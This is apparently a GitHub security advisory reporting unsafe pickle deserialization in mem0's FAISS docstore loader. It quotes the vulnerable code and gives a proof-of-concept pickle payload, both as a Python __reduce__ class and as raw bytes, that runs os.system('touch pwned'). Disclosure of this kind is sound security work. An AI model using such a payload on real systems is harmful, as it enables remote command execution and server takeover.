[Security] Code Execution via unsafe deserialization #3778
Description
Summary
An Unsafe Deserialization via pickle.load() in mem0 allows Remote Command Execution on the server host.
Details
The vulnerability is caused by the usage of vulnerable function of pickle serialization library (faiss.py#L94).
import pickle
# ...
def _load(self, index_path: str, docstore_path: str):
"""
Load FAISS index and docstore from disk.
Args:
index_path (str): Path to FAISS index file.
docstore_path (str): Path to docstore pickle file.
"""
try:
self.index = faiss.read_index(index_path)
with open(docstore_path, "rb") as f:
self.docstore, self.index_to_id = pickle.load(f)
logger.info(f"Loaded FAISS index from {index_path} with {self.index.ntotal} vectors")
except Exception as e:
logger.warning(f"Failed to load FAISS index: {e}")
self.docstore = {}
self.index_to_id = {}PoC
For a simple proof of concept we're using the bytes representation of pickled object below:
class Evil:
def __reduce__(self):
return (os.system, ("touch pwned",))that is: \x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch pwned\x94\x85\x94R\x94..
Using this payload as content of the FAISS pickled file, an attacker can execute any arbitrary system command.
Impact
Usually if attackers can control the FAISS index file, they can poison or manipulate search results by injecting malicious vectors that distort nearest-neighbor retrieval.
In this case, attackers can run arbitrary system commands without any restriction (e.g. they could use a reverse shell and gain access to the server).
The impact is high as the attacker can completely takeover the server host.
References
Credits
Edoardo Ottavianelli (@edoardottt)